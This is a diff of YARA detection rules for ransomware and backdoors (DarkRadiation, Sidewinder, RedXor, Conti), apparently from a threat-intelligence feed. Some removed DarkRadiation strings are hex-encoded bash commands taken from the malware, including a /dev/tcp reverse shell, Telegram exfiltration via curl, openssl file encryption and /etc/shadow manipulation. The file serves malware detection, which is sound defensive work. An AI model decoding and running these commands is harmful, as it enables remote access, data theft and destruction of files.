fa 4d 85 c9 48 89 44 24 30 48 89 7c 24 60 48 8b 7c 24 70 4c 0f 44 ca 4d 85 c0 48 89 6c } - $s5 = { 8b 44 24 50 4d 85 ff 4c 89 38 0f 85 12 f8 ff ff e9 dc f9 ff ff 0f 1f 84 00 00 00 00 00 49 83 bd 68 0c 00 00 00 0f 84 bb f7 ff ff 48 8b 05 e3 6f 30 00 49 8b be 18 04 00 00 ff 10 49 8b b5 68 0c 00 00 48 8d 3d ae 26 0b 00 31 c0 49 c7 86 18 04 00 00 00 00 00 00 e8 22 9b 00 00 48 85 c0 49 89 86 18 04 00 00 0f 85 96 f7 ff ff e9 1d f9 ff ff 0f 1f 44 00 00 41 80 bd ea 0e 00 00 00 48 8d 05 01 26 0b 00 48 89 44 24 60 0f 88 2f f6 ff ff 83 fb 07 0f 87 2a 01 00 00 48 8d 05 76 28 0b 00 89 da 48 63 14 90 48 01 d0 ff e0 0f 1f 00 4c 8b 7c 24 50 49 8b 3f e8 e3 fa fe ff 85 c0 0f 85 eb f7 ff ff 49 8b 3f e8 f3 fa fe ff 49 89 47 08 e9 1e f9 ff ff 66 2e 0f 1f 84 00 00 00 00 00 49 8b b6 d0 00 00 00 49 8b bd f0 10 00 00 e8 5d cf 00 00 85 c0 0f 85 91 f9 ff ff 49 8b 86 d8 03 00 00 45 8b 86 98 01 00 00 8b 80 80 00 00 00 a8 02 74 0d 41 81 f8 bb 01 00 00 0f 84 b9 01 00 00 a8 01 74 0a 41 83 f8 50 0f 84 ab 01 00 00 41 0f b6 86 ad 03 00 00 48 8d 0d 2e e7 0a 00 48 8d 15 8a 1c 0b 00 48 8d 3d de 25 0b 00 48 89 ce 83 e0 02 48 8d 05 3c 07 0b 00 48 0f 45 ca 48 8b 54 24 58 48 0f 45 f0 31 c0 e8 14 9a 00 00 49 89 86 38 04 00 00 48 85 c0 0f 85 99 f9 ff ff e9 0f f8 ff ff 48 8d 05 05 25 0b 00 48 89 44 24 60 e9 2f f5 ff ff 48 8d 05 ef 24 0b 00 48 89 44 24 60 e9 1e f5 ff ff 48 8d 05 56 cd 0a 00 48 89 44 24 60 e9 0d f5 ff ff 48 8d 05 d6 24 0b 00 48 89 44 24 60 e9 fc f4 ff ff 48 8d 05 0e d1 0a 00 48 89 44 24 60 e9 eb f4 ff ff 66 2e 0f 1f 84 00 00 00 00 00 49 8b 86 d0 03 00 00 f6 80 80 00 00 00 03 74 28 8d 43 fd 83 f8 01 0f 86 6a 02 00 00 41 f6 85 eb 0e 00 00 01 74 12 49 83 bd f8 14 00 00 ff 0f 84 62 02 00 00 0f 1f 40 00 41 80 a5 68 06 00 00 bf 48 8d 05 44 e6 0a 00 41 f6 85 68 06 00 00 40 48 89 c1 48 8d 05 60 24 0b 00 48 0f 44 c1 48 89 44 24 70 e9 01 f8 ff ff 66 0f 1f 84 00 00 00 00 00 83 7f 18 04 4c 8d 3d f3 0a 0b 00 } + $s1 = { 55 8b ec b8 48 12 00 00 e8 a3 52 00 00 a1 00 d0 40 00 33 c5 89 45 fc 56 57 68 08 02 00 00 8d 85 cc ed ff ff 50 51 ff 15 2c 80 40 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 8d 85 cc ed ff ff 50 c7 85 b8 ed ff ff 00 00 00 00 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 12 6a 00 56 ff 15 58 80 40 00 56 8b f8 ff 15 20 80 40 00 8d 85 c8 ed ff ff 50 8d 95 b8 ed ff ff 8d 8d cc ed ff ff 89 bd c8 ed ff ff e8 bc fd ff ff 8b bd b8 ed ff ff b8 4d 5a 00 00 83 c4 04 66 39 07 74 1b 68 c1 00 00 00 ff 15 34 80 40 00 5f 5e 8b 4d fc 33 cd e8 fe 08 00 00 8b e5 } + $s2 = { 8b 47 3c 81 3c 07 50 45 00 00 75 d9 8b 47 1c 8b b5 c8 ed ff ff 8b 4f 20 2b f0 85 c9 74 04 8b f1 2b f0 53 56 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 8b 4f 1c 56 03 cf 8b d8 51 53 89 9d c4 ed ff ff e8 96 5d 00 00 68 08 02 00 00 8d 85 f4 f9 ff ff 6a 00 50 e8 33 25 00 00 83 c4 18 8d 85 f4 f9 ff ff 50 6a 00 6a 00 68 1c 80 00 00 6a 00 ff 15 30 81 40 00 b8 18 00 00 00 68 ee 00 00 00 66 89 85 0c fc ff ff 8d 85 0e fc ff ff 6a 00 50 c7 85 fc fb ff ff 00 00 3f 00 c7 85 00 fc ff ff 47 00 5b 00 c7 85 04 fc ff ff 09 00 19 00 c7 85 08 fc ff ff 08 00 0d 00 e8 d1 24 00 00 f3 0f 7e 05 c4 bd 40 00 a1 d4 bd 40 00 68 ec 00 00 00 89 85 0c ff ff ff 66 0f d6 85 fc fe ff ff f3 0f 7e 05 cc bd 40 00 8d 85 10 ff ff ff 6a 00 50 66 0f d6 85 04 ff ff ff e8 93 24 00 00 83 c4 18 33 } + $s3 = { 0f b7 8c 05 fc fe ff ff 66 31 8c 05 fc fb ff ff 0f b7 8c 05 fe fe ff ff 66 31 8c 05 fe fb ff ff 0f b7 8c 05 00 ff ff ff 66 31 8c 05 00 fc ff ff 0f b7 8c 05 02 ff ff ff 66 31 8c 05 02 fc ff ff 83 c0 08 3d 00 01 00 00 72 b6 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fb ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 8d 85 f4 f9 ff ff 50 ff 15 28 80 40 00 68 d8 00 00 00 8d 85 24 fe ff ff 6a 00 50 c7 85 fc fd ff ff 1f 00 33 00 c7 85 00 fe ff ff 58 00 4e 00 c7 85 04 fe ff ff 5d 00 1b 00 c7 85 08 fe ff ff 59 00 27 00 c7 85 0c fe ff ff 70 00 2d 00 c7 85 10 fe ff ff 16 00 13 00 c7 85 14 fe ff ff 03 00 1c 00 c7 85 18 fe ff ff 0d 00 2a 00 c7 85 1c fe ff ff 07 00 51 00 c7 85 20 fe ff ff 08 00 13 00 e8 8f 23 00 00 f3 0f 7e 05 d8 bd 40 00 66 a1 00 be 40 00 66 0f d6 85 fc fe ff ff f3 0f 7e 05 e0 bd 40 00 66 0f d6 85 04 ff ff ff f3 0f 7e 05 e8 bd 40 00 66 0f d6 85 0c ff ff ff f3 0f 7e 05 f0 bd 40 00 68 d6 00 00 00 66 89 85 24 ff ff ff 66 0f d6 85 14 ff ff ff f3 0f 7e 05 f8 bd 40 00 8d 85 26 ff ff ff 6a 00 50 66 0f d6 85 1c ff ff ff e8 1f 23 00 00 83 c4 18 33 } + $s4 = { 0f b7 84 0d fc fe ff ff 66 31 84 0d fc fc ff ff 0f b7 84 0d fe fe ff ff 66 31 84 0d fe fc ff ff 0f b7 84 0d 00 ff ff ff 66 31 84 0d 00 fd ff ff 0f b7 84 0d 02 ff ff ff 66 31 84 0d 02 fd ff ff 83 c1 08 81 f9 00 01 00 00 72 b5 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fc ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 6a 00 8d 85 c0 ed ff ff 50 6a 00 6a 01 56 53 8b 1d 00 80 40 00 c7 85 c0 ed ff ff 00 00 00 00 ff d3 ff b5 c0 ed ff ff 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 6a 00 6a 00 8d 8d c0 ed ff ff 51 50 6a 01 56 ff b5 c4 ed ff ff 89 85 bc ed ff ff ff d3 8b 85 c0 ed ff ff 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 89 85 b8 ed ff ff 68 00 00 00 40 8d 85 f4 f9 ff ff 50 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b 1d 38 80 40 00 83 fe ff 74 55 3d b7 00 00 00 75 0b 6a 00 6a 00 6a 00 56 ff } + $s5 = { 55 8b ec 83 ec 0c a1 00 d0 40 00 33 c5 89 45 fc 53 8b 5d 08 56 57 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 51 89 55 f4 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 67 83 ff 02 74 62 6a 00 56 ff 15 58 80 40 00 89 03 85 c0 74 47 c7 45 f8 00 00 00 00 ff 15 0c 80 40 00 ff 33 6a 08 50 ff 15 08 80 40 00 8b 4d f4 6a 00 89 01 8d 4d f8 51 ff 33 50 56 ff 15 14 80 40 00 56 ff 15 20 80 40 00 8b c7 5f 5e 5b 8b 4d fc 33 cd e8 d4 0a 00 00 8b e5 } + $s6 = { 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f } condition: - uint32(0)==0x464c457f and filesize >100KB and 4 of ($s*) + uint16(0)==0x5a4d and filesize >40KB and 5 of ($s*) } -rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_3 : FILE +rule ARKBIRD_SOLG_APT_Sidewinder_Nov_2020_1 : FILE { meta: - description = "Detect structures of scripts like used by the DarkRadiation ransomware" + description = "Detect Sidewinder DLL decoder algorithm" author = "Arkbird_SOLG" - id = "144eb08d-e222-5f6f-925d-33077953e7e6" - date = "2021-07-03" - modified = "2021-07-05" - reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_3.yara#L1-L29" + id = "9e948949-f38d-5a76-a34c-965ec9be070d" + date = "2020-11-14" + modified = "2020-11-15" + reference = "https://twitter.com/hexfati/status/1325397305051148292" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-15/APT_SideWinder_Nov_2020_1.yar#L1-L12" license_url = "N/A" - logic_hash = "8d2fa53f5abd327d100ffc71863f3b49ce8a19f1a72db556902d95ae6ba09d4a" + logic_hash = "661eb5510ff0aa59b38b2c023653f0a23867a2813d854fbd0a7a6b657d9ba671" score = 75 - quality = 55 + quality = 75 tags = "FILE" - hash1 = "bc6e4b879228c248b7ff9aebbf857e94354829a98b6aea9b1c187005cbc2e0d0" - hash2 = "691afd4ef5f33d99053c57456ce9fa126e29d51d4dd510928193d8c3332547b1" - hash3 = "fdd8c27495fbaa855603df4f774fe86bbc21743f59fd039f734feb07704805bd" - tlp = "White" - adversary = "FERRUM" + hash1 = "8d7ad2c603211a67bb7abf2a9fe65aefc993987dc804bf19bafbefaaca066eaa" strings: - $s1 = { 66 6f 72 20 66 69 6c 65 20 69 6e 20 60 66 69 6e 64 20 2f 20 2d 6e 61 6d 65 20 27 2a 2e 73 68 27 20 2d 74 79 70 65 20 66 20 2d 65 78 65 63 20 67 72 65 70 20 2d 6c } - $s2 = { 72 6d 20 2d 72 66 20 2f 76 61 72 2f 6c 6f 67 2f 79 75 6d 2a } - $s3 = { 69 66 20 72 70 6d 20 2d 71 20 6f 70 65 6e 73 73 6c } - $s4 = { 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 20 2d 69 6e 20 24 66 69 6c 65 20 2d 6f 75 74 20 24 66 69 6c 65 2e e2 98 a2 } - $x1 = { 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 27 24 54 4f 4b 45 4e } - $x2 = { 4d 53 47 5f 55 52 4c 3d 24 55 52 4c 27 2f 73 65 6e 64 4d 65 73 73 61 67 65 3f 63 68 61 74 5f 69 64 3d 27 } - $x3 = { 55 50 44 5f 55 52 4c 3d 24 55 52 4c 27 2f 67 65 74 55 70 64 61 74 65 73 3f 6f 66 66 73 65 74 3d 27 } - $x4 = { 62 61 73 68 20 2d 69 20 3e 26 20 2f 64 65 76 2f 74 63 70 2f 24 49 50 2f 24 50 4f 52 54 20 30 3e 26 31 } - $x5 = { 6d 73 67 3d 22 5b 2b 5d 20 53 68 65 6c 6c 20 52 75 6e 6e 69 6e 67 2e 22 } - $x6 = { 72 65 73 3d 24 28 63 75 72 6c 20 2d 73 20 2d 58 20 50 4f 53 54 20 24 4d 53 47 5f 55 52 4c 20 2d 64 20 63 68 61 74 5f 69 64 3d 24 49 44 5f 4d 53 47 20 2d 64 20 74 65 78 74 3d 22 44 4f 4e 45 21 21 21 22 20 26 29 } - $y1 = { 23 21 2f 62 69 6e 2f 62 61 73 68 } - $y2 = { 3b [2-5] 3d 27 [2-5] 27 3b [2-5] 3d 27 [2-5] 27 3b [2-5] 3d 27 [2-5] 27 3b [2-5] 3d 27 [2-5] 27 3b } - $y3 = { 65 76 61 6c 20 22 24 [2-5] 24 [2-5] 24 [2-5] 24 } + $s = { 13 30 05 00 ?? 00 00 00 01 00 00 11 ?? ?? 00 00 ?? ?? ?? 00 00 [30-80] 2B 16 07 08 8F 1? } condition: - filesize >1KB and (3 of ($s*) or 5 of ($x*) or all of ($y*)) + uint16(0)==0x5a4d and filesize >3KB and $s } -rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Redxor_Feb_2021_1 : FILE { meta: - description = "Detect the DarkRadiation ransomware" + description = "Detect RedXor backdoor (Feb 2021)" author = "Arkbird_SOLG" - id = "13d77ecc-14ab-54ce-9eec-2d614f5ae8e4" - date = "2021-07-03" - modified = "2021-07-05" - reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_1.yara#L1-L25" + id = "10ae10b7-b351-5dda-9408-aa01a40e3d6a" + date = "2021-03-14" + modified = "2021-05-24" + reference = "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-23/RedXor/MAL_RedXor_Feb_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "6fbc6eed7dd7f92af0cd8b3b2726636a64dc8de0b795b176169817994f44d4fa" + logic_hash = "b4e3ea24bb19abe7065ed5fc94f65e68ea84b11da7b45936ee991ef6aac6d33d" score = 75 - quality = 61 + quality = 75 tags = "FILE" - hash1 = "1c2b09417c1a34bbbcb8366c2c184cf31353acda0180c92f99828554abf65823" - hash2 = "d0d3743384e400568587d1bd4b768f7555cc13ad163f5b0c3ed66fdc2d29b810" - hash3 = "e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842" + hash1 = "0423258b94e8a9af58ad63ea493818618de2d8c60cf75ec7980edcaa34dcc919" + hash2 = "0a76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253b0559" tlp = "White" - adversary = "FERRUM" + adversary = "Winnti" strings: - $s1 = { 50 41 53 53 5f 44 45 43 3d 24 28 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 62 61 73 65 36 34 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 64 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 5f 44 45 20 3c 3c 3c 20 24 31 29 } - $s2 = { 72 6d 20 2d 72 66 20 24 50 41 54 48 5f 54 45 4d 50 5f 46 49 4c 45 2f 24 4e 41 4d 45 5f 53 43 52 49 50 54 5f 43 52 59 50 54 } - $s3 = { 74 65 6c 65 67 72 61 6d 5f 62 6f 74 2f [5-15] 2d 6f 20 22 2f } - $s4 = { 2d 6f 20 22 2f 74 6d 70 2f 62 61 73 68 2e 73 68 22 3b 63 64 20 2f 74 6d 70 3b 63 68 6d 6f 64 20 2b 78 20 62 61 73 68 2e 73 68 3b 2e 2f 62 61 73 68 2e 73 68 3b } - $s5 = { 78 61 72 67 73 20 2d 50 20 31 30 20 2d 49 20 46 49 4c 45 20 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 } - $s6 = { 78 61 72 67 73 20 2d 50 20 31 30 20 2d 49 20 46 49 4c 45 20 6f 70 65 6e 73 73 6c 20 65 6e 63 20 2d 61 65 73 2d 32 35 36 2d 63 62 63 20 2d 73 61 6c 74 20 2d 70 61 73 73 20 70 61 73 73 3a 24 50 41 53 53 5f 44 45 43 20 2d 69 6e 20 46 49 4c 45 20 2d 6f 75 74 20 46 49 4c 45 2e } - $s7 = { 75 73 65 72 6d 6f 64 20 2d 2d 73 68 65 6c 6c 20 2f 62 69 6e 2f 6e 6f 6c 6f 67 69 6e } - $s8 = { 67 72 65 70 20 2d 46 20 22 24 22 20 2f 65 74 63 2f 73 68 61 64 6f 77 20 7c 20 63 75 74 20 2d 64 3a 20 2d 66 31 20 7c 20 67 72 65 70 20 2d 76 20 22 [1-15] 22 20 7c 20 78 61 72 67 73 20 2d 49 20 46 49 4c 45 20 67 70 61 73 73 77 64 20 2d 64 20 46 49 4c 45 20 77 68 65 65 6c } - $s9 = { 73 79 73 74 65 6d 63 74 6c 20 73 74 6f 70 20 64 6f 63 6b 65 72 20 26 26 20 73 79 73 74 65 6d 63 74 6c 20 64 69 73 61 62 6c 65 20 64 6f 63 6b 65 72 } + $seq1 = { 0f b7 05 [2] 20 00 66 85 c0 0f 85 cd 00 00 00 48 8d 85 ?? ff ff ff be 10 00 00 00 48 89 c7 e8 [2] ff ff 66 c7 85 ?? ff ff ff 02 00 0f b7 05 [2] 20 00 0f b7 c0 89 c7 e8 [2] ff ff 66 89 85 ?? ff ff ff 48 8b 45 d8 48 89 c7 e8 [2] ff ff 89 85 ?? ff ff ff ba 00 00 00 00 be 01 00 00 00 bf 02 00 00 00 e8 [2] ff ff 89 85 ?? ff ff ff 83 bd ?? ff ff ff ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 } + $seq2 = { 48 8d 8d ?? ff ff ff 8b 85 ?? ff ff ff ba 10 00 00 00 48 89 ce 89 c7 e8 [2] ff ff 83 f8 ff 75 47 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 } + $seq3 = { 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8b 95 [2] fd ff 48 8d 85 [2] fd ff 48 89 ce 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff 8b 85 30 ff ff ff 48 63 d8 8b 85 30 ff ff ff 48 63 c8 48 8d 95 [2] fd ff 48 8d 85 [2] fe ff 49 89 d8 be [2] 40 00 48 89 c7 e8 [2] ff ff 89 85 2c ff ff ff 8b 85 2c ff ff ff 48 63 d0 48 8d 9d [2] fe ff 8b 85 ?? ff ff ff b9 00 00 00 00 48 89 de 89 c7 e8 [2] ff ff 48 83 f8 ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 } + $seq4 = { c7 45 a8 01 00 00 00 c7 45 ac 01 00 00 00 c7 05 [2] 20 00 00 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba ?? 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 48 89 c2 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff 48 89 ce 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff ba ff 0f 00 00 48 89 ce 89 c7 e8 [2] ff ff 89 85 40 ff ff ff 83 bd 40 ff ff ff ff 75 0a c7 85 40 ff ff ff 00 00 00 00 48 8d 85 [2] fd ff be [2] 40 00 48 89 c7 e8 [2] ff ff 48 85 c0 0f 84 d0 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba 02 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff e8 [2] ff ff 89 c7 e8 [2] ff ff 48 89 45 e8 be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff 48 8b 45 e8 48 8b 00 48 89 c6 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff bb [2] 40 00 48 8d 95 [2] fd ff 48 8d 85 [2] fd ff 41 b8 [2] 60 00 48 89 d1 ba [2] 60 00 48 89 de 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff c7 45 ac 00 00 00 } + $seq5 = { 55 48 89 e5 53 89 fb 89 f0 48 89 55 d8 89 4d d4 88 5d e4 88 45 e0 0f b6 45 e4 88 45 f2 0f b6 45 e0 88 45 f3 c7 45 f4 00 00 00 00 c7 45 f4 00 00 00 00 eb 29 8b 45 f4 48 98 48 03 45 d8 8b 55 f4 48 63 d2 48 03 55 d8 0f b6 0a 0f b6 55 f2 31 ca 88 10 0f b6 45 f3 00 45 f2 83 45 f4 01 8b 45 f4 3b 45 d4 7c cf b8 00 00 00 00 5b } + $seq6 = { 55 48 89 e5 53 48 81 ec 68 0d 00 00 48 89 bd d8 f2 ff ff c7 45 90 31 32 37 2e c7 45 94 30 2e 30 2e 48 c7 45 98 31 00 00 00 c7 45 a0 00 00 00 00 c7 85 70 ff ff ff 30 30 2d 30 c7 85 74 ff ff ff 30 2d 30 30 c7 85 78 ff ff ff 2d 30 30 2d c7 85 7c ff ff ff 30 30 2d 30 c7 45 80 30 00 00 00 48 c7 45 a8 [2] 40 00 } condition: - filesize >5KB and 5 of ($s*) + uint32(0)==0x464c457f and filesize >25KB and all of ($seq*) } -rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_2 : FILE +rule ARKBIRD_SOLG_RAN_Conti_Dec_2021_1 : FILE { meta: - description = "Detect the DarkRadiation ransomware" + description = "Detect Conti ransomware (v3)" author = "Arkbird_SOLG" - id = "3580a41a-ba2e-5a47-b35d-b2482fbc913a" - date = "2021-07-03" - modified = "2021-07-05" - reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_2.yara#L1-L27" + id = "efa65b86-95d7-55fd-b98a-7b3c747a671c" + date = "2021-12-16" + modified = "2021-12-16" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/RAN_Conti_Dec_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "b21db1658845cafe37950d69b5bc0aab203e7bea3e43f95394236e0133234e2d" + logic_hash = "038ad0c7ffcabcaf85de1adadf8a386063f96d5cd0e348a3cea4ea3b7b10fe70" score = 75 - quality = 57 + quality = 75 tags = "FILE" - hash1 = "3bab2947305c00df66cb4d6aaef006f10aca348c17aa2fd28e53363a08b7ec68" - hash2 = "652ee7b470c393c1de1dfdcd8cb834ff0dd23c93646739f1f475f71a6c138edd" - hash3 = "79aee7a4459d49dc6dfebf1a45d32ccc3769a1e5c1f231777ced3769607ba9c1" - tlp = "White" - adversary = "FERRUM" + hash1 = "a05c8129e607c6d0976d79f69c6a020d15767a9ef3a9c9f1570c5193a7b5b76b" + hash2 = "3125aa67fc6e09a00aad39e0eb8024b849d54de353b1a45b5297d4c5d5e87941" + hash3 = "03597628e999d791f4cc442328024235db9a929467a62ef0a00c91a76161f0e1" + tlp = "white" + adversary = "RAAS" strings: - $s1 = { 61 6c 6c 54 68 72 65 61 64 73 3d 28 24 31 29 } - $s2 = { 4d 53 47 5f 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 27 24 54 4f 4b 45 4e 27 2f 73 65 6e 64 4d 65 73 73 61 67 65 3f 63 68 61 74 5f 69 64 3d 27 } - $s3 = { 69 66 20 5b 5b 20 22 24 6d 61 73 74 65 72 22 20 21 3d 20 22 24 73 6c 61 76 65 22 20 5d 5d } - $s4 = { 75 73 65 72 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 31 7d 27 29 } - $s5 = { 6d 61 73 74 65 72 3d 24 28 63 61 74 20 2f 74 6d 70 2f 2e 63 63 77 20 7c 20 77 63 20 2d 6c 29 } - $s6 = { 73 65 6e 64 5f 6d 65 73 73 61 67 65 20 24 69 64 20 22 24 28 68 6f 73 74 6e 61 6d 65 29 20 24 28 68 6f 73 74 6e 61 6d 65 20 2d 49 29 } - $s7 = { 73 74 61 72 74 5f 74 68 72 65 61 64 20 24 61 6c 6c 54 68 72 65 61 64 73 } - $s8 = { 69 70 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 32 7d 27 29 } - $s9 = { 70 6f 72 74 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 33 7d 27 29 } - $s10 = { 24 28 63 75 72 6c 20 2d 73 20 2d 2d 69 6e 73 65 63 75 72 65 20 2d 2d 64 61 74 61 2d 75 72 6c 65 6e 63 6f 64 65 20 22 74 65 78 74 3d [2-15] 22 20 22 24 4d 53 47 5f 55 52 4c [2-15] 22 20 26 29 } - $s11 = { 73 6c 61 76 65 3d 24 28 65 63 68 6f 20 22 24 7b [2-15] 7d 22 20 7c 20 77 63 20 2d 6c 29 } + $s1 = { 81 ec 78 0b 00 00 c6 45 c4 00 c6 45 c5 48 c6 45 c6 45 c6 45 c7 64 c6 45 c8 45 c6 45 c9 46 c6 45 ca 45 c6 45 cb 46 c6 45 cc 45 53 c6 45 cd 45 bb 7f 00 00 00 c6 45 ce 45 8a 45 c5 80 7d c4 00 56 57 8b f9 75 2c 33 f6 66 0f 1f 44 00 00 8a 44 35 c5 b9 45 00 00 00 0f b6 c0 2b c8 6b c1 1b 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 c5 46 83 fe 0a 72 dc 8d 45 c5 89 85 88 f4 ff ff c6 45 b8 00 c6 45 b9 65 c6 45 ba 32 c6 45 bb 45 c6 45 bc 32 c6 45 bd 43 c6 45 be 32 c6 45 bf 6d c6 45 c0 32 c6 45 c1 32 c6 45 c2 32 8a 45 b9 80 7d b8 00 75 29 33 f6 8a 44 35 b9 b9 32 00 00 00 0f b6 c0 2b c8 8d 04 49 c1 e0 03 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 b9 46 83 fe 0a 72 d9 8d 45 b9 89 85 8c f4 ff ff 8d 8d 34 f7 ff ff c6 85 34 f7 ff ff 00 c6 85 35 f7 ff ff 6d c6 85 36 f7 ff ff 11 c6 85 37 f7 ff ff 54 c6 85 38 f7 ff ff 11 c6 85 39 f7 ff ff 58 c6 85 3a f7 ff ff 11 c6 85 3b f7 ff ff 58 c6 85 3c f7 ff ff 11 c6 85 3d f7 ff ff 5a c6 85 3e f7 ff ff 11 c6 85 3f f7 ff ff 56 c6 85 40 f7 ff ff 11 c6 85 41 f7 ff ff 11 c6 85 42 f7 ff ff 11 8a 85 35 f7 ff ff e8 e2 a2 00 00 89 85 90 f4 ff ff c6 85 c4 f8 ff ff 00 c6 85 c5 f8 ff ff 18 c6 85 c6 f8 ff ff 0c c6 85 c7 f8 ff ff 57 c6 85 c8 f8 ff ff 0c c6 85 c9 f8 ff ff 52 c6 85 ca f8 ff ff 0c c6 85 cb f8 ff ff 52 c6 85 cc f8 ff ff 0c c6 85 cd f8 ff ff 10 c6 85 ce f8 ff ff 0c c6 85 cf f8 ff ff 52 c6 85 d0 f8 ff ff 0c c6 85 d1 f8 ff ff 0c c6 85 d2 f8 ff ff 0c 8a 85 c5 f8 ff ff 80 bd c4 f8 ff ff 00 75 2a 33 c9 66 90 8a 84 0d c5 f8 ff ff 0f b6 c0 83 e8 0c 6b c0 19 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d c5 f8 ff ff 41 83 f9 0e 72 da 8d 85 c5 f8 ff ff 89 85 94 f4 ff ff c6 85 04 f9 ff ff 00 c6 85 05 f9 ff ff 74 c6 85 06 f9 ff ff 4d c6 85 07 f9 ff ff 23 c6 85 08 f9 ff ff 4d c6 85 09 f9 ff ff 72 c6 85 0a f9 ff ff 4d c6 85 0b f9 ff ff 72 c6 85 0c f9 ff ff 4d c6 85 0d f9 ff ff 5a c6 85 0e f9 ff ff 4d c6 85 0f f9 ff ff 42 c6 85 10 f9 ff ff 4d c6 85 11 f9 ff ff 4d c6 85 12 